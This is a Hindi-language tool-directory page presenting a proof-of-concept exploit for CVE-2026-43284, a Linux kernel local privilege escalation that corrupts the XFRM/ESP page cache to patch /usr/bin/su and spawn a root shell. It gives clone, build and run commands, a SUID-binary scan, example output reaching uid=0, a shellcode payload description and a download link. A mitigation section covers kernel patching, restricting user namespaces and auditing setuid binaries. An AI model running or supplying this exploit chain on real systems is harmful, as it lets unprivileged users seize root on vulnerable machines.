Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-43284-DirtyFrag-PoC — CVE-2026-43284 के लिए प्रूफ-ऑफ-कॉन्सेप्ट — 4-बाइट XFRM/ESP पेज-कैश राइट प्रिमिटिव जो एक setuid बाइनरी को पैच करता है (x86_64, user namespaces). इसमें kernel preflight + SUID स्कैन शामिल है। | Kitploit
उपकरण/GitHubGitHub/jayhutajulu1/cve-2026-43284-dirtyfrag-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषण
GitHubjayhutajulu1/cve-2026-43284-dirtyfrag-poc

CVE-2026-43284-DirtyFrag-PoC

CVE-2026-43284 के लिए प्रूफ-ऑफ-कॉन्सेप्ट — 4-बाइट XFRM/ESP पेज-कैश राइट प्रिमिटिव जो एक setuid बाइनरी को पैच करता है (x86_64, user namespaces). इसमें kernel preflight + SUID स्कैन शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

CVE-2026-43284 — 4-बाइट XFRM/ESP

CVE Platform Type Status

प्रूफ-ऑफ-कॉन्सेप्ट XFRM/ESP पेज-कैश भ्रष्टाचार के माध्यम से स्थानीय विशेषाधिकार वृद्धि
4-बाइट राइट प्रिमिटिव · 48 पुनरावृत्तियाँ · 192-बाइट ELF ओवरराइट · अविशेषाधिकृत उपयोगकर्ता + netns


प्रूफ ऑफ कॉन्सेप्ट

WSL2 Ubuntu 24.04 पर प्रीफ्लाइट जाँच और एक्सप्लॉइट चरण uid=0 सत्यापन के साथ सफल रूट शेल

बाएँ: कर्नेल प्रीफ्लाइट, setuid स्कैन, और एक्सप्लॉइट श्रृंखला  ·  दाएँ: रूट शेल स्पॉन किया गया — id / whoami पुष्टि करते हैं uid=0(root)
WSL2 · Ubuntu 24.04.1 LTS · कर्नेल 6.6.87.2-microsoft-standard-WSL2 पर परीक्षण किया गया


root@kitploit:~
  ╔═══════════════════════════════════════╗
  ║  SLEY - CVE-2026-43284 dirtyfrag PoC  ║
  ╚═══════════════════════════════════════╝

अस्वीकरण: केवल उन प्रणालियों पर अधिकृत सुरक्षा अनुसंधान, शिक्षा और परीक्षण के लिए जो आपके स्वामित्व में हैं या जिनके परीक्षण की स्पष्ट अनुमति है। लेखक दुरुपयोग के लिए जिम्मेदार नहीं हैं।


अवलोकन

तब भी काम करता है जब algif_aead ब्लैकलिस्टेड हो — एक्सप्लॉइट सीधे कर्नेल XFRM/ESP कोड पथ का उपयोग करता है।


विशेषताएँ

शोषण से पहले अंतर्निहित प्रीफ्लाइट जाँचें:

  1. कर्नेल कॉन्फ़िग — CONFIG_USER_NS, CONFIG_XFRM, CONFIG_INET_ESP की पुष्टि करता है
    (WSL2 पर /boot/config-*, /lib/modules/*/config, या /proc/config.gz पढ़ता है)
  2. Setuid स्कैन — सिस्टम पर SUID बाइनरी सूचीबद्ध करता है (find / -perm -4000)
  3. एक्सप्लॉइट — पेज कैश को पैच करता है, PTY के माध्यम से रूट शेल स्पॉन करता है, बाहर निकलने पर लक्ष्य को पुनर्स्थापित करता है

आवश्यकताएँ

Kernel options

root@kitploit:~
CONFIG_USER_NS=y
CONFIG_XFRM=y
CONFIG_INET_ESP=m   # or =y

त्वरित जाँच:

root@kitploit:~
# bare metal / VM
grep -E 'CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=' /boot/config-$(uname -r)

# WSL2
zcat /proc/config.gz | grep -E 'CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS='

अन्य

  • Linux कर्नेल CVE-2026-43284 के लिए असुरक्षित (देखें पैच स्थिति)
  • gcc, libc, libutil (forkpty के लिए)
  • पढ़ने योग्य setuid लक्ष्य बाइनरी (डिफ़ॉल्ट: /usr/bin/su)

बिल्ड

root@kitploit:~
git clone https://github.com/jayhutajulu1/CVE-2026-43284.git
cd CVE-2026-43284
make

या मैन्युअल:

root@kitploit:~
gcc -O0 -Wall -o sley-dirtyfrag sley-dirtyfrag.c -lutil

-O0 जानबूझकर है — ऑप्टिमाइज़ेशन समय-संवेदनशील splice/UDP व्यवहार को तोड़ सकता है।


उपयोग

1. पुष्टि करें कि आप अविशेषाधिकृत हैं

root@kitploit:~
id
# uid=1000(youruser) gid=1000(youruser) groups=...

2. एक्सप्लॉइट चलाएँ

root@kitploit:~
./sley-dirtyfrag                  # default target: /usr/bin/su
./sley-dirtyfrag /usr/bin/passwd  # custom setuid binary

यह उपकरण तीन स्वचालित चरण चलाता है:

चरणयह क्या करता है

3. रूट एक्सेस सत्यापित करें

स्पॉन किए गए शेल के अंदर:

root@kitploit:~
id
# uid=0(root) gid=0(root) groups=0(root)

whoami
# root

4. पुनर्स्थापित करने के लिए बाहर निकलें

Ctrl+D दबाएँ या exit टाइप करें। PoC पेज कैश को छोड़ देता है ताकि मूल ऑन-डिस्क बाइनरी स्वचालित रूप से पुनर्स्थापित हो जाए।

यदि पुनर्स्थापना विफल हो:

root@kitploit:~
echo 3 | sudo tee /proc/sys/vm/drop_caches

कमांड संदर्भ

कमांडविवरण

उदाहरण आउटपुट

root@kitploit:~
┌─[ phase 1] kernel config preflight
  → /proc/config.gz
  [+] CONFIG_USER_NS        = y  (required =y)
  [+] CONFIG_XFRM           = y  (required =y)
  [+] CONFIG_INET_ESP       = m  (required =m or =y)
  kernel options OK.

┌─[ phase 2] setuid binary scan
  10 /usr/bin/su  ← target
  found 14 setuid binaries.

┌─[ phase 3] exploit
  [*] unshare userns+netns, register 48 XFRM SA, splice→UDP 4500...
  [+] corrupt               all iterations done
  [+] verify                ELF patch detected

  ╔══════════════════════════════════════╗
  ║  root shell — exit to restore        ║
  ╚══════════════════════════════════════╝

शमन

कर्नेल पैच लागू करें (अनुशंसित)

Fixed inf4c50a4034e6 (मुख्यलाइन, 8 मई 2026)
Introducedcac2661c53f3 (जनवरी 2017)

कार्रवाई: उस डिस्ट्रो कर्नेल में अपग्रेड करें जिसमें फिक्स शामिल हो, या पैच किए गए मुख्यलाइन ट्री से बिल्ड करें।

root@kitploit:~
# check your running kernel
uname -r

# verify fix is present (example — adjust for your distro's package naming)
# apt update && apt install --only-upgrade linux-image-$(uname -r)

कड़ी सुरक्षा विकल्प (गहराई में रक्षा)

अविशेषाधिकृत उपयोगकर्ता नेमस्पेस प्रतिबंधित करें

यह एक्सप्लॉइट रूट के बिना unshare(CLONE_NEWUSER | CLONE_NEWNET) पर निर्भर करता है।

root@kitploit:~
# runtime (may not exist on all kernels)
sysctl kernel.unprivileged_userns_clone=0

# or disable at build time
# CONFIG_USER_NS is not set

नोट: उपयोगकर्ता नेमस्पेस को अक्षम करने से यह PoC अवरुद्ध होता है लेकिन आवश्यक रूप से CVE-2026-43500 (userns के बिना सिस्टम के लिए rxrpc वेरिएंट) नहीं।

setuid बाइनरी का ऑडिट करें

root@kitploit:~
find / -perm -4000 -type f 2>/dev/null
# remove or harden binaries you do not need

संदिग्ध समझौते के बाद कैश छोड़ें

यदि आपको लगता है कि किसी setuid बाइनरी को मेमोरी में पैच किया गया था:

root@kitploit:~
echo 3 | sudo tee /proc/sys/vm/drop_caches
# re-verify binary integrity from package manager / known-good hash

यह कैसे काम करता है

  1. unshare(CLONE_NEWUSER | CLONE_NEWNET) — पृथक उपयोगकर्ता/नेटवर्क नेमस्पेस (रूट की आवश्यकता नहीं)।
  2. 48 XFRM सुरक्षा संघ पंजीकृत करें — ESN seq_hi में एन्कोडेड शेलकोड बाइट (प्रति SA 4 बाइट)।
  3. UDP_ENCAP_ESPINUDP के साथ UDP पोर्ट 4500 के माध्यम से ट्रिगर करें:
    • splice() लक्ष्य फ़ाइल को पाइप में पढ़ता है
    • splice() डेटा को पाइप से UDP सॉकेट में ले जाता है
    • पेज-कैश पृष्ठ skip_cow पथ के माध्यम से ESP स्कैटर-गैदर सूची में प्रवेश करता है
    • authencesn स्कैटरवॉक assoclen + cryptlen पर seq_hi लिखता है
  4. HMAC विफल होता है — लेकिन पेज-कैश राइट बनी रहती है।
  5. पैच किए गए setuid बाइनरी को निष्पादित करें — न्यूनतम ELF setuid(0) / setgid(0) / चलाता है।

परीक्षण किए गए वातावरण

EnvironmentKernel
WSL2 Ubuntu 24.04.1 LTS6.6.87.2-microsoft-standard-WSL2
Ubuntu 24.04असुरक्षित बिल्ड
Fedora 44असुरक्षित बिल्ड

संबंधित कार्य

  • CVE-2026-43500 — उपयोगकर्ता नेमस्पेस के बिना सिस्टम के लिए rxrpc वेरिएंट; 8-बाइट pcbc(fcrypt) ब्रूट-फोर्स प्रिमिटिव के साथ /etc/passwd को लक्षित करता है। इस रिपॉजिटरी में शामिल नहीं है।

फ़ाइलें


लाइसेंस

अनुसंधान और शिक्षा के लिए ज्यों-का-त्यों प्रदान किया गया। जिम्मेदारी से उपयोग करें।


लेखक

SLEY — CVE-2026-43284 dirtyfrag PoC

यदि इसने आपके शोध में मदद की, तो रिपॉजिटरी को स्टार करने पर विचार करें।

टूल डाउनलोड करें
CVECVE-2026-43284
Typeस्थानीय विशेषाधिकार वृद्धि (LPE)
VectorXFRM / ESP-UDP (UDP_ENCAP_ESPINUDP) पेज-कैश भ्रष्टाचार
Primitiveप्रति पुनरावृत्ति 4 बाइट (ESN seq_hi)
Payload192-बाइट x86_64 ELF (setuid(0) + setgid(0) + execve("/bin/sh"))
Default target/usr/bin/su
Architectureकेवल x86_64
Privileges requiredअविशेषाधिकृत उपयोगकर्ता (उपयोगकर्ता + नेटवर्क नेमस्पेस का उपयोग करता है)
1कर्नेल कॉन्फ़िग प्रीफ्लाइट (CONFIG_USER_NS, CONFIG_XFRM, CONFIG_INET_ESP)
2पूर्ण-सिस्टम setuid बाइनरी स्कैन; डिफ़ॉल्ट लक्ष्य को हाइलाइट करता है
3बैकअप लक्ष्य → पेज कैश पैच (48× 4-बाइट राइट) → रूट शेल स्पॉन करें
./sley-dirtyfrag/usr/bin/su का शोषण (डिफ़ॉल्ट)
./sley-dirtyfrag /path/to/suidकस्टम setuid बाइनरी का शोषण
makesley-dirtyfrag बनाएँ
make cleanबाइनरी हटाएँ
उपायप्रभाव
कर्नेल पैच/अपग्रेड करेंअंतर्निहित पेज-कैश राइट बग को समाप्त करता है
उपयोगकर्ता नेमस्पेस प्रतिबंधित करेंइस PoC को अवरुद्ध करता है (CONFIG_USER_NS आवश्यक)
अनावश्यक setuid बाइनरी हटाएँव्यवहार्य लक्ष्य कम करता है (chmod u-s, या अनइंस्टॉल)
लॉकडाउन / LSM (SELinux, AppArmor)नीति के आधार पर पोस्ट-एक्सप्लॉइट प्रभाव को सीमित कर सकता है
XFRM + UDP/4500 की निगरानी करेंअविशेषाधिकृत नेमस्पेस से असामान्य SA पंजीकरण और ESP-in-UDP ट्रैफ़िक का पता लगाएं
execve("/bin/sh")
  • शेल से बाहर निकलने पर — पेज कैश छोड़ें (posix_fadvise) ताकि कर्नेल डिस्क से साफ़ फ़ाइल को पुनः लोड करे।
  • FileDescription
    sley-dirtyfrag.cएक्सप्लॉइट स्रोत
    Makefileबिल्ड सहायक
    proof-of-concept-1.jpgPoC स्क्रीनशॉट — प्रीफ्लाइट + एक्सप्लॉइट
    proof-of-concept-2.jpgPoC स्क्रीनशॉट — रूट शेल सत्यापन
    README.mdयह फ़ाइल